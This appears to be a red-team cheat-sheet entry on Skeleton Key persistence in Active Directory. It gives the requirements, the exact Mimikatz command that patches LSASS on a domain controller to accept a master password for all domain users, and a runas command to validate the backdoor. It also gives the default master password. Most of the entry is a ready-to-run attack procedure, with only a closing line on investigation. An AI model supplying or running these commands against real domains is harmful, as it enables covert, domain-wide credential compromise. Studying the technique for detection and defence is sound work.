Skeleton Key persistence patches LSASS on a domain controller so a master password works for domain users while their real passwords still work. It is memory-only and usually disappears when the domain controller reboots, but it is high impact while active.
Requirements
Administrative execution on a domain controller.
Ability to interact with LSASS.
Mimikatz or equivalent tooling.
Apply Skeleton Key
mimikatz.exe "privilege::debug" "misc::skeleton" "exit"
Validate
runas /netonly /user:ootw\Administrator cmd
Use the Skeleton Key password when prompted.
mimikatz
Notes
- Skeleton Key does not change user passwords in AD.
- Existing passwords continue to work.
- The master password works only while the DC LSASS patch remains active.
- Rebooting the affected DC removes the patch, but the compromise that allowed it must still be investigated.